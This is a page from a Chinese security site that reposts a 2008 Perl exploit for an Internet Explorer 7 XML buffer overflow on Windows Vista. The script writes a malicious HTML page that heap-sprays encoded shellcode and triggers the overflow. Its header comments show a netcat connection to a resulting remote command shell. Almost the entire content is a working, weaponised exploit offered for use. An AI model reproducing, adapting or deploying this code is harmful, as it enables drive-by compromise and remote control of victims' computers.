首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Microsoft Internet Explorer XML Buffer Overflow Exploit
来源:jbrownsec.blogspot.com 作者:Brown 发布时间:2008-12-29  
#!/usr/bin/perl
# msie_xmlbof_vista.pl
# Microsoft Internet Explorer XML Buffer Overflow Exploit
# Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com]
#
# I wanted a reliable shell, so I figured I'd whip up something nice for IE7+Vista
# Only the first hundred calculators popping up on the screen is hilarious
# Core/Concepts from other available exploits... Yeah, thanks skylined/krafy/muts
#
# bash$ perl msie_xmlbof_vista.pl
# Usage: msie_xmlbof_vista.pl <filename.html>
# bash$ perl msie_xmlbof_vista.pl /var/www/msie_xmlbof_vista.html
#
# *** Launching IE7 on Vista SP1 with URL: http://192.168.100.105/msie_xmlbof_vista.html ***
#
# bash$ nc 192.168.100.118 30702
# Microsoft Windows [Version 6.0.6001]
# Copyright (c) 2006 Microsoft Corporation.  All rights reserved.
#
# C:\Users\vista\Desktop>
#
# Enjoy :)

$filename = $ARGV[0];
if(!defined($filename))
{

     print "Usage: $0 <filename.html>\n";

}

$exploit = '<html>' . "\n" . '<div id="msie_xmlbof_vista">x</div>' . '<script>' . "\n\n" .
   'var shellcode = unescape("%u4343%u4343%u43eb%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b" + ' . "\n" .
   '                         "%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac" + '  . "\n" .
   '                         "%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b" + ' . "\n" .
   '                         "%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64%u3040" + ' . "\n" .
   '                         "%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c%u6850%u3233" + ' . "\n" .
   '                         "%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff%uef89" + ' . "\n" .
   '                         "%uc589%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22%u7dab" + ' . "\n" .
   '                         "%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6%u7934" + ' . "\n" .
   '                         "%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%uee77%uccfe%u8950" + ' . "\n" .
   '                         "%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650" + ' . "\n" .
   '                         "%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347" + ' . "\n" .
   '                         "%uc656%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1" + ' . "\n" .
   '                         "%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353%u5353" + ' . "\n" .
   '                         "%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353%u5343%u534b" + ' . "\n" .
   '                         "%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe%u5bff%uc031%u5048" +'  . "\n" .
   '                         "%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff%uef87%u12bb%u6d6b%ue8d0" + ' . "\n" .
   '                         "%ufec2%uffff%uc483%u615c%u89eb");' . "\n\n" . 'var block = unescape("%u0D0D%u0D0D");' . "\n\n" .
   'while (block.length < 100000) block += block;' . "\n" . 'var memory = new Array();' . "\n" . 'for (i = 0;i < 1000;i++) memory[i] += block + shellcode;' . "\n\n" .
   'xmlrox = "<XML id=microosuck><ie><vista><![CDATA[<img src=http://&#x0a0a;&#x0a0a;.microo.suck>]]></vista></ie></XML><SPAN datasrc=#microosuck datafld=vista dataformatas=html>' .
   '<XML id=microosuck></XML><SPAN datasrc=#microosuck datafld=vista dataformatas=html></SPAN></SPAN>";' . "\n\n" . 'mssox           = document.getElementById("msie_xmlbof_vista");' .
   "\n" . 'mssox.innerHTML = xmlrox;' . "\n\n" . '</script>' . "\n" . '</html>';

     open(FILE, '>' . $filename);
     print FILE $exploit;
     close(FILE);

exit;

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·IntelliTamper 2.07/2.08 (MAP F
·Amaya Web Browser <= 11.0.1 Re
·MS Windows Media Player * (.WA
·Firefox, Internet Explorer, Op
·Joomla Component com_liveticke
·Exploits joomla com_lowcosthot
·Joomla Component com_ice 0.5b2
·PSI remote integer overflow Do
·BulletProof FTP Client (.bps F
·FreeBSD 7/6x protosw kernel ex
·Joomla Component mdigg 2.2.8 B
·SAWStudio 3.9i (prf File) Loca
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved